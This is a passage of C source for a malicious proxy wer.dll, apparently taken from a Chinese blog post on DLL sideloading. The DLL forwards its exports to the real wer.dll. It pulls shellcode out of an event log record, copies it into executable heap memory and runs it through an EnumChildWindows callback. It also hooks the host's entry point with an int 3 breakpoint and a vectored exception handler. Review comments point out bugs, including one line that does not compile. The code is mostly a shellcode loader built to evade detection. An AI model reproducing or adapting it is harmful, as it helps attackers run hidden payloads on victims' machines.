    // 7 bytes past pAddress + dwDataLength (heap overrun), and the API
    // docs require 64-bit alignment for InterlockedExchange64.
    BOOL WriteMemory(BYTE* pAddress, BYTE* pData, DWORD dwDataLength)
    {
    	for (DWORD i = 0; i < dwDataLength; i++)
    	{
    		InterlockedExchange64((LONG64*)(pAddress + i), *(pData + i));
    	}
    	if (memcmp(pAddress, pData, dwDataLength) != 0) {
    
    		return 1;
    	}
    
    	return 0;
    }
    
    // Thread routine started from DllMain: pulls the payload record out of
    // the event log, copies its raw data into a freshly created executable
    // heap and transfers control to it through the EnumChildWindows
    // callback pointer (a callback-based way of calling into a buffer
    // without a direct call or CreateThread on it).
    //
    // NOTE(review): ReadEvents' return value is ignored; when no record with
    // EventID 9999 is found, DataLength/DataOffset are taken from whatever
    // the buffer happens to contain.
    // NOTE(review): HeapCreate/HeapAlloc results are unchecked and the heap
    // is never destroyed. HEAP_CREATE_ENABLE_EXECUTE yields private RWX
    // memory — an easy hunting signal for memory scanners.
    // NOTE(review): EnumChildWindows with a NULL parent enumerates top-level
    // windows and invokes the "callback" once per window, so if the payload
    // returns it is presumably entered again for the next window — verify.
    VOID ExecuteShellcode() {
    
    	DWORD dwLen = 0x10000;
    	PBYTE pShellcode = (PBYTE)malloc(dwLen);
    
    	// Read the record carrying the shellcode from the event log.
    	ReadEvents(pShellcode, dwLen);
    	
    	// Executable heap for the payload.
    	HANDLE hHep = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
    	PBYTE pMem = (PBYTE)HeapAlloc(hHep, 0, ((PEVENTLOGRECORD)pShellcode)->DataLength);
    	
    	// Copy the record's raw data (DataOffset/DataLength) into that heap.
    	WriteMemory(pMem, (BYTE*)(pShellcode + ((PEVENTLOGRECORD)pShellcode)->DataOffset), ((PEVENTLOGRECORD)pShellcode)->DataLength);
    	free(pShellcode);
    	// Run the payload via the enumeration callback.
    	EnumChildWindows((HWND)NULL, (WNDENUMPROC)pMem, NULL);
    }
    
    // Vectored exception handler installed by Patch(). When the host's main
    // thread hits the int 3 planted at its entry point, this handler parks
    // that thread until the payload thread (hThreadHandle) finishes, then
    // resumes execution. Exceptions other than breakpoints are passed on.
    //
    // NOTE(review): every EXCEPTION_BREAKPOINT in the process triggers the
    // wait — ExceptionAddress is never compared with the patched entry
    // point, so any other int 3 (e.g. a debugger's) is swallowed the same way.
    // NOTE(review): the wait is alertable (bAlertable = TRUE), so APCs
    // queued to the main thread still run while it is parked.
    // NOTE(review): the context is not modified and the 0xCC byte is never
    // restored, so resuming does not hand control to the real entry point.
    LONG NTAPI VEH(PEXCEPTION_POINTERS pExcepInfo)
    {
    
    	if (pExcepInfo->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT)
    	{
    		// Hold WerFault's normal flow: the main thread waits for the
    		// shellcode thread to finish.
    		WaitForSingleObjectEx(hThreadHandle, INFINITE, TRUE);
    
    		return EXCEPTION_CONTINUE_EXECUTION;
    	}
    
    
    	return EXCEPTION_CONTINUE_SEARCH;
    }
    
    // Hooks the host executable's entry point: resolves AddressOfEntryPoint
    // from the in-memory PE headers, overwrites its first byte with int 3
    // (0xCC) and registers VEH() to catch the resulting breakpoint.
    //
    // NOTE(review): as written this does not compile — `loaderEntryPoint`
    // in the 0xcc store is undeclared; the variable is `pLoaderEntryPoint`.
    // NOTE(review): the breakpoint byte is never restored and VEH() leaves
    // the context untouched, so the host's real entry point never runs;
    // what the main thread does after the handler returns depends on where
    // the kernel reports the int 3 — verify under a debugger.
    // NOTE(review): AddVectoredExceptionHandler(0, ...) appends the handler
    // to the END of the VEH chain; a nonzero first argument would make it
    // first.
    VOID Patch() {
    
    	HMODULE hLoaderImage = GetModuleHandleA(NULL);
    	DWORD lpflOldProtect;
    	// Image base + AddressOfEntryPoint:
    	//   DWORD index 15 = byte offset 0x3C = IMAGE_DOS_HEADER.e_lfanew,
    	//   NT headers + 40 = OptionalHeader.AddressOfEntryPoint
    	//   (4 signature + 20 file header + 16; same offset for PE32/PE32+).
    	PBYTE pLoaderEntryPoint = (PBYTE)hLoaderImage + *(DWORD*)((PBYTE)hLoaderImage + *((DWORD*)hLoaderImage + 15) + 40);
    	
    	/*
    	Original inline-hook attempt (mov rax, imm64 ; jmp rax), kept for reference.
    	Note that every store below goes through a PBYTE, so only the low byte
    	of each 16/64-bit value is written.
    	VirtualProtect(loaderEntryPoint, 0xc, PAGE_EXECUTE_READWRITE, &lpflOldProtect);
    	*loaderEntryPoint = 0xb848;
    	*(loaderEntryPoint + 2) = (LONGLONG)*ExecuteShellcode;// dereferencing the function pointer yields the function's address
    	*(loaderEntryPoint + 5) = 0xE0FF;
    	VirtualProtect(loaderEntryPoint, 0xc, lpflOldProtect, &lpflOldProtect);
    	*/
    
    	// Plant the int 3 breakpoint at the entry point (one byte; 4 bytes unprotected).
    	VirtualProtect(pLoaderEntryPoint , 4, PAGE_EXECUTE_READWRITE, &lpflOldProtect);
    	*(loaderEntryPoint) = 0xcc;
    	VirtualProtect(pLoaderEntryPoint , 4, lpflOldProtect, &lpflOldProtect);
    	// Register the VEH callback that services the breakpoint.
    	AddVectoredExceptionHandler(0, &VEH);
    }
    
    // Entry point of the proxy wer.dll. On process attach it (1) starts the
    // thread that fetches and runs the payload (ExecuteShellcode) and
    // (2) plants the int 3 / VEH hook on the host's entry point (Patch).
    // Every export of this DLL is forwarded to the real System32\wer.dll by
    // the /export pragmas above, so the host's own imports keep resolving.
    //
    // NOTE(review): CreateThread from DllMain — the new thread presumably
    // cannot start running until the loader lock is released, i.e. after
    // the DllMain calls for this load have returned; verify.
    // NOTE(review): hThreadHandle is never checked for NULL or closed.
    // NOTE(review): the DLL_PROCESS_ATTACH case has no `break` and falls
    // through to the remaining labels, which only `break` — harmless.
    BOOL APIENTRY DllMain( HMODULE hModule,
                           DWORD  ul_reason_for_call,
                           LPVOID lpReserved
                         )
    {
        switch (ul_reason_for_call)
        {
        case DLL_PROCESS_ATTACH:
    		hThreadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExecuteShellcode, NULL, 0, NULL);
    		Patch();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
        }
        return TRUE;
    }
    
    
  • 原文地址:https://blog.csdn.net/xmd213131/article/details/125418805